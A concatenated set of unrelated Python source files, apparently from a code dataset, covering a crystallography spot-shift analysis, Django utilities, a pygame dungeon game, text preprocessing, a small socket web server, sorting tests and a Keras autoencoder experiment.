#plt.axes().set_aspect("equal")
plt.show()
exit()
for key in range(10000):
print(key)
try:
pixel = pickle.load(open(abc_glob_pixel_refine%key,"rb"))
dials = pickle.load(open(abc_glob_dials_refine%key,"rb"))
except IOError:
continue
assert len(pixel) == len(dials)
for ispot in range(len(pixel)):
dials_roi = dials[ispot].roi
pixel_roi = pixel[ispot].roi
focus = dials_roi.focus()
S = flex.double(range(focus[0]))
F = flex.double(range(focus[1]))
# matrix giving the slow coordinate:
cslow = S.matrix_outer_product(flex.double([1]*focus[1]))
# matrix giving the fast coordinate:
cfast = flex.double([1]*focus[0]).matrix_outer_product(F)
sum_dials_roi = flex.sum(dials_roi)
dials_expectation_value = col( ( flex.sum(cfast*dials_roi)/sum_dials_roi ,
flex.sum(cslow*dials_roi)/sum_dials_roi ) )
sum_pixel_roi = flex.sum(pixel_roi)
pixel_expectation_value = col( ( flex.sum(cfast*pixel_roi)/sum_pixel_roi ,
flex.sum(cslow*pixel_roi)/sum_pixel_roi ) )
delta_position = pixel_expectation_value - dials_expectation_value
deltafast.append(delta_position[0])
deltaslow.append(delta_position[1])
print (delta_position.elems)
#from IPython import embed; embed()
statss = flex.mean_and_variance(deltaslow)
print("Slow axis stats, mean, stddev=",statss.mean(), statss.unweighted_sample_standard_deviation(),"on N=",len(deltaslow))
statsf = flex.mean_and_variance(deltafast)
print("Fast axis stats, mean, stddev=",statsf.mean(), statsf.unweighted_sample_standard_deviation())
fig, ax = plt.subplots()
# the histogram of the data
n, bins, patches = ax.hist(deltaslow, bins=40, normed=0, histtype="step", range=(-2.0,2.0), color='blue')
n, bins, patches = ax.hist(deltafast, bins=40, normed=0, histtype="step", range=(-2.0,2.0), color='red')
ax.set_xlabel('spot shift (pixels)')
ax.set_ylabel('Count')
ax.set_title(r'Histogram of slow, fast pixel shift')
# commented code for scatter plot
#plt.plot(deltaslow,deltafast,"b,")
#plt.axes().set_aspect("equal")
plt.show()
|
23,163 | 7ed36693b685a8125771de4795998cb715e36b12 | from django.core.exceptions import ValidationError
from django.conf import settings
from django.utils.translation import gettext_lazy as _
from django.utils import timezone
"""
Utils file to save common validators
"""
def val_future_time(value):
"""
function to check if the current value is in a future time
"""
today = timezone.now()
if value < today:
raise ValidationError('Datetime should be a future Date and time')
def val_future_end_time(value):
"""
check for validations in end time by adding min interview duration
ie, end time should be a time grater than now() + min duration
"""
today = timezone.now() + timezone.timedelta(minutes=settings.MIN_INTERVIEW_DURATION)
if value < today:
raise ValidationError(f'Datetime should be atleast {settings.MIN_INTERVIEW_DURATION} min after current Date and time')
|
23,164 | f77fb1200133551ecf0f1767356e9abf8f176985 | import pygame, math, sys
from pygame.font import SysFont
import random
from pygame.locals import *
from sprites import *
from players import *
from singleton import Singleton
SCREEN_H = 1024
SCREEN_W = 768
spritePath = '225842_hyptosis_sprites-and-tiles-for-you.png'
TILE_W = TILE_H = 32
clock = pygame.time.Clock()
k_up = k_down = k_left = k_right = 0
direction = 0
BLACK = (0, 0, 0)
WHITE = (255, 255, 255)
TILES_ACROSS = 5 - 1
TILES_DOWN = 5 - 1
PLAYER_START_X = PLAYER_START_Y = 1
BLOCK_DARKNESS = 0
BLOCK_PLAYER = 1
BLOCK_FLOOR = 2
BLOCK_WALL = 3
BLOCK_TRAP = 4
@Singleton
class DisplayDevice:
def setScreen(self, screen):
self.screen = screen
def getScreen(self):
return self.screen
class Scene(object):
def __init__(self):
pass
def eraseScreen(self, screen):
screen.fill( (0,0,0) )
pass
def render(self, screen):
raise NotImplementedError
def update(self):
raise NotImplementedError
def handle_events(self, events):
raise NotImplementedError
#states:
class InteractiveElementHandler(object):
def __init__(self, obj):
print "saving", obj
self.obj = obj
self.handlers = [ SkillHandler(obj) ]
def eligibleFor(self, object):
print "check eligibility for %s" % object
for handler in self.handlers:
if id(self.obj) == id(object):
return True
return False
def handle(self, object):
for handler in self.handlers:
if self.eligibleFor(object):
print "Handle from InteractiveElementHandler %s, %s, %s" % ( id(self.obj), id(object), self.obj.name )
handler.handle()
class SkillHandler(object):
def __init__(self, skill):
self.skill = skill
self.objectType = skill.appliesTo()
self.states = [ 'PICK_TARGET', 'APPLY_EFFECT', 'ADD_TO_STACK' ]
self.state = 'PICK_TARGET'
def handle(self):
if self.state == 'PICK_TARGET':
print "Pick target for a skill"
#scene.setTargetsForPicking(targets)
if self.state == 'APPLY_EFFECT':
print "Display effect animation"
if self.state == 'ADD_TO_STACK':
print "Add effect to stack"
print "handling from skillHandler"
#pickTarget if eligible
#applySkillEffect
#if duration > 0 : add to effect stack
pass
def pickTarget(self):
if self.skill.maxTargets() < 100:
#register target picker
pass
pass
def applySkillEffect(self):
pass
def eligibleFor(self, object):
return object.appliesTo() == self.objectType
def handle_events(self, events):
for event in events:
if event.type == pygame.MOUSEBUTTONDOWN:
print "Got mouse down"
self.handle_mouse(event)
class SceneMananger(object):
def __init__(self):
self.go_to(
BattleScene( getBattleEntities() )
)
def go_to(self, scene):
self.scene = scene
self.scene.manager = self
class BattleScene(Scene):
def __init__(self, entities):
super(BattleScene, self).__init__()
self.entities = entities
self.interactiveElements = {}
self.fontPlayer = pygame.font.SysFont("Arial",13)
self.screen = DisplayDevice.Instance().getScreen()
self.eraseScreen(self.screen)
self.handlers = {}
self.totalPlayers = 0
self.totalEnemies = 0
self.buildInitiativeSequence()
self.activeCharacterIndex = 0
def buildInitiativeSequence(self):
self.sequence = []
index = 0
for e in self.entities:
if e.type == 'player':
self.totalPlayers = self.totalPlayers + 1
if e.type == 'monster':
self.totalEnemies = self.totalEnemies + 1
self.sequence.append( { "index": index, "initiative": e.initiative } )
index = index + 1
self.sequence = sorted(self.sequence, key = lambda k: k['initiative'], reverse=True)
def drawSequence(self, screen):
startX = 30
startY = 200
offsetX = 10
playerBoxWidth = 60
playerBoxHeight = 30
idx = 0
color = (50, 100, 100)
activeColor = (200, 10, 10)
for seq in self.sequence:
useColor = color
if idx == self.activeCharacterIndex:
useColor = activeColor
xLeft, yLeft = (startX + playerBoxWidth * idx + offsetX * idx, startY)
pygame.draw.rect(screen, useColor,
pygame.Rect(
xLeft, yLeft,
playerBoxWidth, playerBoxHeight),
1)
# draw active player border
text = self.fontPlayer.render( self.entities[seq['index']].name, True, (255, 255, 255))
screen.blit(text, (xLeft + 1, yLeft + playerBoxHeight * .8))
idx = idx + 1
def getActiveCharacter(self):
return self.entities[ self.sequence[self.activeCharacterIndex]['index'] ]
def getPrevActiveCharacter(self):
self.activeCharacterIndex = self.activeCharacterIndex - 1
if self.activeCharacterIndex < 0:
self.activeCharacterIndex = (self.totalPlayers + self.totalEnemies) - 1
return self.sequence[self.activeCharacterIndex]
def getNextActiveCharacter(self):
self.activeCharacterIndex = self.activeCharacterIndex + 1
if self.activeCharacterIndex >= (self.totalPlayers + self.totalEnemies):
self.activeCharacterIndex = 0
return self.sequence[self.activeCharacterIndex]
def drawPlayer(self, screen, obj):
self.interactiveElements['player'] = []
startX = 30
startY = 300
offsetX = 10
playerBoxWidth = 50
playerBoxHeight = 80
idx = 0
color = (50, 100, 100)
activeColor = (200, 10, 10)
for o in obj:
useColor = color
if o == self.getActiveCharacter():
useColor = activeColor
xLeft, yLeft = (startX + playerBoxWidth * idx + offsetX * idx, startY)
rect = pygame.Rect(xLeft, yLeft,playerBoxWidth, playerBoxHeight)
pygame.draw.rect(screen, useColor, rect,1)
self.interactiveElements['player'].append(
{
'collision': rect, 'object': o
}
)
# draw active player border
text = self.fontPlayer.render(o.name, True, (255, 255, 255))
screen.blit(text, (xLeft + 1, yLeft + playerBoxHeight * .8))
idx = idx + 1
# draw players name
def drawEnemy(self, screen, obj):
self.interactiveElements['monsters'] = []
startX = 330
startY = 300
offsetX = 10
playerBoxWidth = 50
playerBoxHeight = 80
idx = 0
color = (50, 100, 100)
activeColor = (200, 10, 10)
for o in obj:
useColor = color
if o == self.getActiveCharacter():
useColor = activeColor
xLeft, yLeft = (startX + playerBoxWidth * idx + offsetX * idx, startY)
rect = pygame.Rect(xLeft, yLeft,playerBoxWidth, playerBoxHeight)
pygame.draw.rect(screen, useColor,rect,1)
self.interactiveElements['monsters'].append(
{
'collision': rect, 'object': o
}
)
# draw active player border
text = self.fontPlayer.render(o.name, True, (255, 255, 255))
screen.blit(text, (xLeft + 1, yLeft + playerBoxHeight * .8))
idx = idx + 1
#draw availableSkills
def drawEntitySkills(self, screen, entity):
self.interactiveElements['skillButtons'] = []
idx = 0
color = (100,100,100)
xLeft = 30
yLeft = 400
skillBoxWidth = 80
skillBoxHeight = 40
# erase old stuff
pygame.draw.rect(screen, (100,0,0),
pygame.Rect(
xLeft, yLeft,
200, 40),
)
for skill in entity.skills:
xLeft = xLeft + skillBoxWidth * idx
rect = pygame.Rect(xLeft, yLeft,skillBoxWidth, skillBoxHeight)
pygame.draw.rect(screen, color,rect,1)
self.interactiveElements['skillButtons'].append(
{
'collision': rect,
'object': skill
}
)
if id(skill) not in self.handlers:
h = InteractiveElementHandler(skill)
self.handlers[id(skill)] = h
text = self.fontPlayer.render(skill.name, True, (255, 255, 255))
screen.blit(text, (xLeft + 1, yLeft + skillBoxHeight * .6))
idx = idx + 1
def handle_events(self, events):
#wait for combat actions
for event in events:
#for handler in self.handlers:
# if handler.handle(event): #intercept event by handler, if possible
# return
if hasattr(event, 'key'):
if event.type == pygame.KEYDOWN:
if event.key == K_LEFT: self.getPrevActiveCharacter()
if event.key == K_RIGHT: self.getNextActiveCharacter()
if event.key == K_UP: continue
if event.key == K_DOWN: continue
if event.type == pygame.MOUSEBUTTONDOWN:
print "Got mouse down"
self.handle_mouse(event)
pass
def handle_mouse(self, event):
for objTypes in self.interactiveElements:
for obj in self.interactiveElements[objTypes]:
if obj['collision'].collidepoint(event.pos):
print "Collision detected at %s with %s" % (event.pos , obj['object'])
for k, handler in self.handlers.iteritems() :
handler.handle(obj['object'])
def update(self):
pass
def render(self, screen):
enemies = []
players = []
for e in self.entities:
if e.type == 'player':
players.append(e)
if e.type == 'monster':
enemies.append(e)
self.drawPlayer(screen, players)
self.drawEnemy(screen, enemies)
self.drawSequence(screen)
self.drawEntitySkills(screen, self.getActiveCharacter() )
pygame.draw.rect(screen, (10,10,250),
pygame.Rect(
30, 500,
500, 100),
)
text = self.fontPlayer.render("Current active is %s" % self.getActiveCharacter().name, True, (255, 255, 255))
screen.blit(text, (30, 500))
#Render player
#Render enemy
#Render combat interface
pass
class DungeonScene(Scene):
def __init__(self, levelId):
super(DungeonScene, self).__init__()
self.screen = DisplayDevice.Instance().getScreen()
#load sprites from sheet
self.loadTiles()
self.textBuffer = []
self.clock = pygame.time.Clock()
self.direction = 0
self.position = (PLAYER_START_X, PLAYER_START_Y)
self.map = Map()
self.map.map[PLAYER_START_X][PLAYER_START_Y] = BLOCK_FLOOR
self.init_text()
def move(self, hor, vert):
x, y = self.position
x = x + hor
y = y + vert
if x > TILES_ACROSS or x < 0 or y > TILES_DOWN or y < 0:
return
self.map.generateRoomIfNotGenerated( (x,y) )
if self.map.isTraversable((x,y)):
self.map.generateRoomsAroundCoords( (x, y) )
self.position = (x, y)
self.screen.blit(self.bg, (0, 0))
def handle_events(self, events):
hor = 0
vert = 0
for event in events:
if not hasattr(event, 'key'): continue
if event.type == pygame.KEYDOWN:
if event.key == K_LEFT: hor = -1
if event.key == K_RIGHT: hor = 1
if event.key == K_UP: vert = -1
if event.key == K_DOWN: vert = 1
# TODO: sync text display with player movement
self.move(hor, vert)
# self.map.print_ascii_map()
def init_text(self):
self.myfont = pygame.font.Font(None,15)
def loadTiles(self):
self.spriteSheet = spritesheet(spritePath)
#self.player = self.spriteSheet.image_at((424, 818, TILE_W , TILE_H ), colorkey=-1)
self.player = self.spriteSheet.image_at((13*TILE_W + 8, 25*TILE_H+16 , TILE_W, TILE_H ),colorkey=-1)
self.player.convert_alpha()
self.bg = self.spriteSheet.image_at((0, 0, TILE_W , TILE_H ))
self.tileFloor = self.spriteSheet.image_at((13*TILE_W+8, 22*TILE_H+16, TILE_W, TILE_H ))
self.tileWall = self.spriteSheet.image_at((13*TILE_W+8, 21*TILE_H+16, TILE_W, TILE_H ))
self.tileTrap = self.spriteSheet.image_at((15*TILE_W+8, 22*TILE_H+16, TILE_W, TILE_H ))
def update(self):
pass
def render(self, screen):
self.draw_Text(
self.textBuffer,
(300, 300),
screen
)
self.redraw_map_tiles(screen)
#TRANSPARENCY IS SOMEWHERE AROUND
self.draw_PlayerTile(screen)
''' Render part '''
def redraw_map_tiles(self, screen):
#print self.map.map.__len__()
for row in range(TILES_ACROSS + 1):
for col in range(TILES_DOWN + 1):
if self.map.map[row][col] == BLOCK_DARKNESS:
pygame.draw.rect(screen, BLACK, (row * TILE_W, col * TILE_H, TILE_W, TILE_H))
if self.map.map[row][col] == BLOCK_FLOOR:
screen.blit(self.tileFloor, Map.convertTileToCoords( (row, col) ) )
if self.map.map[row][col] == BLOCK_TRAP:
screen.blit(self.tileTrap, Map.convertTileToCoords( (row, col) ) )
if self.map.map[row][col] == BLOCK_WALL:
screen.blit(self.tileWall, Map.convertTileToCoords( (row, col) ) )
def draw_PlayerTile(self, screen):
screen.blit(self.player, Map.convertTileToCoords( self.position) )
#print "Drawing player at %s, %s" % (self.position)
#TODO: add text wrapper
def draw_Text(self,text, coords, screen):
x, y = coords
text = ""
for textString in self.textBuffer:
text += textString + ". "
label = self.myfont.render(text, 1, (255,255,255))
emptySurface = pygame.Surface( (200,200) )
emptySurface.fill((0,0,0))
screen.blit(emptySurface, (x, y))
screen.blit(label, (x, y))
self.textBuffer = []
class TitleScene(object):
def __init__(self):
super(TitleScene, self).__init__()
self.font = pygame.font.SysFont('Arial', 56)
self.sfont = pygame.font.SysFont('Arial', 32)
def render(self, screen):
screen.fill((10, 10, 10))
text1 = self.font.render('> press space to start <', True, (255, 255, 255))
screen.blit(text1, (200, 50))
def update(self):
pass
def handle_events(self, events):
for e in events:
if e.type == KEYDOWN and e.key == K_SPACE:
self.manager.go_to(DungeonScene(0))
class Map(object):
def __init__(self):
self.map = []
for i in range(TILES_ACROSS + 1):
row = []
for j in range(TILES_DOWN + 1):
row.append(0)
self.map.append(row)
#Sets block enabled for redraw
def clear_block(self, position):
#column, row = self.convertTileToCoords(position)
column, row = position
#print "Column %s, Row %s" % (str(column), str(row))
self.map[column][row] = 0
def set_block(self, position, block_id):
column, row = position
#print "Column %s, Row %s" % (str(column), str(row))
self.map[column][row] = block_id
def print_ascii_map(self):
for row in self.map:
print row
@staticmethod
def convertTileToCoords(coords):
tileX, tileY = coords
return (tileX * TILE_W, tileY * TILE_H)
def generateRoomIfNotGenerated(self, position):
col, row = position
if self.map[col][row] == BLOCK_DARKNESS:
self.map[col][row] = int (random.choice("234"))
def generateRoomsAroundCoords(self, position):
x,y = position
possiblePos = ( (x-1,y), (x+1,y), (x,y-1), (x,y+1) )
for side in possiblePos:
x,y = side
if x >= 0 and x < len(self.map) \
and y >= 0 and y < len(self.map[x]):
self.generateRoomIfNotGenerated( (x, y) )
def isTraversable(self, position):
x, y = position
if self.map[x][y] == BLOCK_WALL:
return False
return True
def getBattleEntities():
t1 = PlayerMage()
t1.name = 'TankTwo'
t1.position = 2
t1.initiative = 6
t2 = PlayerMage()
t2.name = 'TankOne'
t2.position = 1
t2.initiative = 2
h1 = PlayerMage()
h1.name = 'TankOne'
h1.position = 3
h1.initiative = 4
e1 = MonsterZombie()
e1.name = 'EnemyOne'
e1.position = 1
e1.initiative = 5
e2 = MonsterZombie()
e2.name = 'EnemyTwo'
e2.position = 2
e2.initiative = 3
return [t1,t2,h1,e1,e2]
def main():
pygame.init()
screen = pygame.display.set_mode((SCREEN_W, SCREEN_H))
DisplayDevice.Instance().setScreen(screen)
running = True
manager = SceneMananger()
while running:
if pygame.event.get(QUIT):
running = False
return
events = pygame.event.get()
manager.scene.handle_events(events)
manager.scene.update()
manager.scene.render(screen)
pygame.display.flip()
for event in events:
if not hasattr(event, 'key'): continue
if event.key == K_ESCAPE:
print "ESC pressed"
sys.exit(0)
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_F1:
manager.go_to(TitleScene())
if event.key == pygame.K_F2:
manager.go_to(DungeonScene(0))
if event.key == pygame.K_F3:
manager.go_to(BattleScene(
getBattleEntities()
))
if __name__ == "__main__":
main()
|
23,165 | 60efe75099b8d685b9c1eeeea7db4f1fc15dab5f | import pandas as pd
from scipy import sparse
import numpy as np
from data.misc import is_blank
from features.process_text import process_text_tokenize_detokenize
def locate_empty_strings(flora_data_frame_text):
"""Takes a pandas series and return index to use for data frame drop operation."""
assert type(flora_data_frame_text) == pd.core.series.Series, 'Input is not a pandas Series'
flora_data_frame_text = flora_data_frame_text.map(lambda x: x.strip()) # convert all whitespace to nothing to
# subsequently test and drop, https://stackoverflow.com/questions/2405292/how-to-check-if-text-is-empty-spaces
# -tabs-newlines-in-python
indx = flora_data_frame_text.map(is_blank) == False
return indx
def process_length_in_place(flora_data_frame, tokenized_stop_words):
"""Process text using the same text processing procedure as was used in the DTM/TFIDF models, and recreate the
length column with the cleaned text strings. This results in a more accurate length metric.
:return:
flora_data_frame with revised text length column and rows with only blanks or empty text
strings removed."""
before_process_length = flora_data_frame.text.apply(len)
# Applying the same text processing used in the DTM/TFIDF models
flora_data_frame.text = process_text_tokenize_detokenize(flora_data_frame.text, tokenized_stop_words)
# Remove strings with no textual data
flora_data_frame_no_empty = flora_data_frame[locate_empty_strings(flora_data_frame.text)]
assert flora_data_frame_no_empty.shape[0] < flora_data_frame.shape[0], 'Rows with empty text strings not removed'
after_process_length = flora_data_frame_no_empty.text.apply(len)
assert sum(after_process_length) < sum(before_process_length), 'Text not processed'
# Add new length data to data frame
length_processed_flora_data_series = pd.concat(
[flora_data_frame_no_empty.text, after_process_length.rename('length')], axis=1)
flora_data_frame_no_empty = flora_data_frame_no_empty.drop(columns='length')
flora_data_frame_no_empty = flora_data_frame_no_empty.drop(columns='text')
flora_data_frame_no_empty = pd.concat([flora_data_frame_no_empty, length_processed_flora_data_series], axis=1)
return flora_data_frame_no_empty
def prepare_length_features(text_counts, custom_vec, length_processed_flora_data_frame):
"""Instead of a sparse matrix of text counts, let's build a sparse matrix including text counts and length to
train the model. """
vocab = custom_vec.get_feature_names() # https://stackoverflow.com/questions/39121104/how-to-add-another-feature
# -length-of-text-to-current-bag-of-words-classificati
length_model_data_frame = pd.DataFrame(text_counts.toarray(), columns=vocab)
length_model_data_frame = pd.concat(
[length_model_data_frame, length_processed_flora_data_frame['length'].reset_index(drop=True)], axis=1)
length_model_data_frame_values = length_model_data_frame.values.astype(np.float64)
length_model_sparse = sparse.csr_matrix(length_model_data_frame_values)
assert length_model_sparse.shape > text_counts.shape, 'Length model should have one more column of data than BOW ' \
'model '
return length_model_sparse
|
23,166 | 544c7a9e633b17e39eb44ebaa281732f6770dc1b | from django import forms
from seyitechapp.models import *
class Msg(forms.ModelForm):
username = models.CharField( max_length=30)
email = models.EmailField()
subject = models.CharField(max_length=15)
messages = models.TextField()
class Meta:
model = Message
fields = ('username', 'email', 'subject', 'messages')
def save(self, commit=True):
user = super().save(commit=False)
user.username = self.cleaned_data['username']
user.email = self.cleaned_data['email']
user.subject = self.cleaned_data['subject']
user.messages = self.cleaned_data['messages']
if commit:
user.save()
return Message |
23,167 | 1b0066dffbf61fe07e16cea8c43d0dbadab48764 | from django.contrib import admin
# Register your models here.
from django.utils.html import format_html
from .models import Meme
class MemeAdmin(admin.ModelAdmin):
list_display = ('post_id', 'thumbnail', 'pub_date', 'post_url', 'views', 'valid',)
list_editable = ('valid', 'views')
fields = ('views', 'thumbnail',)
ordering = ('-pub_date',)
def thumbnail(self, obj):
return format_html(u'<img src="%s" height="400" width="400"/>' % obj.image_url)
thumbnail.allow_tags = True
admin.site.register(Meme, MemeAdmin)
|
23,168 | c3beca2cf0ca4be2130043cbf6f374fbbb6b06c7 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
# __author__ = "张开"
# Date: 2019/11/25
import os
import datetime
BASE_PATH = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
DATA_PATH = os.path.join(BASE_PATH, 'data')
# 测试脚本文件名
file_name = '接口测试示例-2.xlsx'
TEST_CASE_FILE_NAME = os.path.join(DATA_PATH, file_name)
# ---------------- 日志相关 --------------------
# 日志级别
LOG_LEVEL = 'debug'
LOG_STREAM_LEVEL = 'debug' # 屏幕输出流
LOG_FILE_LEVEL = 'info' # 文件输出流
# 日志文件命名
LOG_FILE_NAME = os.path.join(BASE_PATH, 'logs', datetime.datetime.now().strftime('%Y-%m-%d') + '.log')
# ----------------- allure 相关 ----------------
# 生成allure报告命令
result_path = os.path.join(BASE_PATH, 'report', 'result')
allure_html_path = os.path.join(BASE_PATH, 'report', 'allure_html')
ALLURE_COMMAND = 'allure generate {} -o {} --clean'.format(result_path, allure_html_path)
# allure报告路径
ALLURE_REPORT_PATH = os.path.join(BASE_PATH, 'report')
# ------------ 邮件相关配置 --------------
MAIL_HOST = "smtp.qq.com" # 设置服务器
MAIL_USERNAME = "你的qq邮箱" # 用户名
MAIL_PASSPHRASE = "你的QQ授权码" # 口令
MAIL_SENDER = '12061xxx@qq.com' # 发件人
MAIL_RECEIVED = ['1206xxxxx@qq.com'] # 接收邮件,可设置为你的QQ邮箱或者其他邮箱
# 邮件主题
MAIL_SUBJECT = '{} 执行{}的测试报告'.format(datetime.datetime.now().strftime('%Y-%m-%d'), file_name)
# 邮件正文
MAIL_CONTENT = '请查阅 - {}\n注意,在解压后使用pycharm打开'.format(MAIL_SUBJECT)
if __name__ == '__main__':
print(ALLURE_COMMAND) |
23,169 | fac075c7497161e0284704d7721e7d40d9a06fab | import socket
HOST = "0.0.0.0"
PORT = 8888
def response():
return "<html><body><h1>Hello World</h1></html></body>"
def worker(sck):
t = response()
sck.send(bytes("HTTP/1.1 200 OK\r\n", "UTF-8"))
sck.send(bytes("Content-Type: text/html\r\n", "UTF-8" ) )
sck.send(bytes("Content-Length: " + str(len(t)) + "\r\n","UTF-8"))
sck.send(bytes("\r\n", "UTF-8"))
sck.send(bytes(str(t), "UTF-8"))
sck.close()
if __name__ == "__main__":
ssck = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ssck.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
ssck.bind((HOST, PORT))
ssck.listen(1)
print("server start!")
while True:
sck,addr = ssck.accept()
worker(sck) |
23,170 | c80f89f9049db6a6e35f69f04adc473dfa61e48d | from .photoloader import IcedIDPhotoLoader
from .peloader import IcedIDPELoader
|
23,171 | 044eefa9966dae05e0fd9a3281a3e270d4c0612d | def solve(x, y, d, cnt):
res = 0
if d>3: return 0
if scope(x, y): return 0
if x == sx and y==sy: return cnt
if a[x][y] in temp: return 0
else: temp.append(a[x][y])
res = max(res, solve(x+dd[d][0], y+dd[d][1], d, cnt+1), solve(x+dd[d+1][0],y+dd[d+1][1], d+1, cnt+1))
temp.pop()
return res
dd=[(1,1), (-1,1), (-1,-1), (1,-1), (0,0)]
def scope(nx, ny):
if nx<0 or ny<0 or nx>n-1 or ny>n-1: return 1
return 0
for t in range(int(input())):
n = int(input())
a=[list(map(int,input().split()))for _ in range(n)]
ans = 0
for i in range(n):
for j in range(n):
temp=[a[i][j]]
sx , sy = i, j
ans = max(ans, solve(i+dd[0][0], j+dd[0][1], 0, 1))
print('#{} {}'.format(t+1, ans if ans!=0 else -1))
|
23,172 | 856e78c28d0ef485bd6c5f4eee8ffff00c66a78f | """
auther: LeeCHH
"""
import numpy as np
def rle2mask(rle, height, width):
mask = np.zeros(width*height, dtype='bool')
rle = [int(i) for i in rle.strip().split()]
for start, lengeth in zip(rle[0::2], rle[1::2]):
mask[start-1: start+lengeth-1] = True
return mask.reshape((height, width, 1), order='F')
def mask2rle(img):
"""
- https://www.kaggle.com/paulorzp/rle-functions-run-lenght-encode-decode
img: numpy array, 1 -> mask, 0 -> background
Returns run length as string formated
"""
pixels= img.T.flatten()
pixels = np.concatenate([[0], pixels, [0]])
runs = np.where(pixels[1:] != pixels[:-1])[0] + 1
runs[1::2] -= runs[::2]
return ' '.join(str(x) for x in runs)
|
23,173 | 3e2601b2f099143a1d0ce91d0e9fd4976fff94ec | import pytest
from src.algs.sorting import insertion_sort, selection_sort, merge_sort, \
quick_sort, quick_sort_inplace, min_heap_sort, max_heap_sort, bubble_sort
def create_task(lst):
def task(algorithm):
sorted_lst = sorted(lst)
assert algorithm(lst) == sorted_lst
return task
@pytest.mark.parametrize('task', map(create_task, [
# No items
[],
# One item
[42],
# Two sorted items
[4, 8],
# Two unsorted items
[8, 4],
# Many sorted items
[0, 4, 8, 15, 16, 23, 42, 42],
# Many unsorted items
[0, 4, -8, 15, -16, 23, -42, -42],
# Same items
[42] * 8,
]))
@pytest.mark.parametrize('algorithm', [
insertion_sort,
selection_sort,
merge_sort,
quick_sort,
quick_sort_inplace,
min_heap_sort,
max_heap_sort,
bubble_sort,
])
def test_sorting(task, algorithm):
task(algorithm)
|
23,174 | df052574571d74272483245544f1fc189bd4d861 |
from __future__ import print_function
from keras.models import Sequential
from keras.layers import Dense, Input
from keras.models import Model
from keras.callbacks import EarlyStopping
from keras.layers.normalization import BatchNormalization
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.tri as tr
from mpl_toolkits.mplot3d import axes3d, Axes3D
from matplotlib import cm
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' # disable tensorflow warnings
np.random.seed(21345)
epochs = 30
N = 12000 # number of points in the train set
N_test = 3000 # number of points in the test set
A = [[4, 9, 2], [8, 1, 6], [3, 5, 7]]
#################################Gradient Descent function#############################################################
def gradientDescent(m, A, y, x_start, encoder, model, alpha):
gd = np.empty((m, 3))
for i in range(m):
x_input = np.expand_dims(np.squeeze(np.transpose(x_start)), axis=0)
z_pos = encoder.predict(x_input)
y_output = model.predict(x_input)
gd[i, :] = (np.concatenate((z_pos, y_output), axis=1))
Axty = np.dot(A, x_start) - y
x_start = x_start - alpha * 2 * np.dot(np.transpose(A), Axty)
for j in x_start :
i = max(0, i)
return gd
################################Generate points #######################################################################
X1 = 0.1666 * np.random.rand(1, N) - 0.0833
X2 = 1.666 * np.random.rand(1, N) - 0.833
X3 = 0.1666 * np.random.rand(1, N) - 0.0833
# concetenate values into a matrix
X = np.concatenate((X1, X2, X3))
# get the coordinates for each point
x1 = np.asarray(X[0, :])
x2 = np.asarray(X[1, :])
x3 = np.asarray(X[2, :])
# set Z=A*x for x1 and x2
Z = np.dot(A, X)
z1nn = np.asarray(Z[0, :])
z2nn = np.asarray(Z[1, :])
z3nn = np.asarray(Z[2, :])
# set y
y1nn = np.full((1, N), 8)
y2nn = np.full((1, N), 2)
y3nn = np.full((1, N), 5)
# calculate the function f(x)=||y-Ax||^2
fnn = np.transpose((y1nn - z1nn) ** 2 + (y2nn - z2nn) ** 2 + (y3nn - z3nn) ** 2)
# constraint, x returns a big value if x_i<0 and returns 0 elsewhere
for i in range(len(X)):
for j in range(len(X[i])):
if X[i][j] < 0:
fnn[i] = 100000
# modify X so it can be trainable
X_train = np.transpose(X)
################################ Create the model ######################################################################
model = Sequential()
input = Input(shape=(X_train.shape[1],))
hidden1 = Dense(100, activation='elu')(input)
hidden2 = Dense(100, activation='elu')(hidden1)
hidden3 = Dense(100, activation='elu')(hidden2)
hidden4 = Dense(2, activation='elu')(hidden3)
hidden5 = BatchNormalization()(hidden4)
hidden6 = Dense(50, activation='relu')(hidden5)
hidden7 = Dense(50, activation='relu')(hidden6)
hidden8 = Dense(50, activation='relu')(hidden7)
output = Dense(1, activation='linear')(hidden8)
# Encoder
Encoder = Model(input, hidden5)
model = Model(input, output)
# Decoder
encoded_input = Input(shape=(2,))
decoder1 = model.layers[-4](encoded_input)
decoder2 = model.layers[-3](decoder1)
decoder3 = model.layers[-2](decoder2)
decoder4 = model.layers[-1](decoder3)
Decoder = Model(encoded_input, decoder4)
# compile the model
model.compile(loss='mean_squared_error', optimizer='rmsprop')
# Early stopping and fit data
callback = [EarlyStopping(monitor='val_loss', patience=2, min_delta=0.01, verbose=0)]
model.fit(X_train, fnn, epochs=epochs, verbose=1, validation_split=0.25, callbacks=callback)
################### Create testing data #####################################################################
X1test = 0.1666 * np.random.rand(1, N_test) - 0.0833
X2test = 1.666 * np.random.rand(1, N_test) - 0.833
X3test = 0.1666 * np.random.rand(1, N_test) - 0.0833
Xtest = np.concatenate((X1test, X2test, X3test))
x1test = np.asarray(Xtest[0, :])
x2test = np.asarray(Xtest[1, :])
x3test = np.asarray(Xtest[2, :])
Ztest = np.dot(A, Xtest)
z1nntest = np.asarray(Ztest[0, :])
z2nntest = np.asarray(Ztest[1, :])
z3nntest = np.asarray(Ztest[2, :])
y1nntest = np.full((1, N_test), 8)
y2nntest = np.full((1, N_test), 2)
y3nntest = np.full((1, N_test), 5)
fnntest = np.transpose((y1nntest - z1nntest) ** 2 + (y2nntest - z2nntest) ** 2 + (y3nntest - z3nntest) ** 2)
# constraint, x returns a big value if x_i<0 and returns 0 elsewhere
for i in range(len(Xtest)):
for j in range(len(Xtest[i])):
if Xtest[i][j] < 0:
fnntest[i] = 100000
break
Xtest = np.squeeze(np.transpose(Xtest))
################### predict #######################################################################################
# predict the objective function for Xtest
low_dim = Encoder.predict(Xtest)
# gradient predict from decoder
X1dtest = 100 * np.random.rand(1, N_test) - 25
X2dtest = 100 * np.random.rand(1, N_test) - 25
Xdtest = np.concatenate((X1dtest, X2dtest))
Xdtest = np.squeeze(np.transpose(Xdtest))
triangd = tr.Triangulation(Xdtest[:, 0], Xdtest[:, 1])
dlow_dim = Decoder.predict(Xdtest) # one dimensional decoder output
triang = tr.Triangulation(low_dim[:, 0], low_dim[:, 1])
################### gradient##########################################################################################
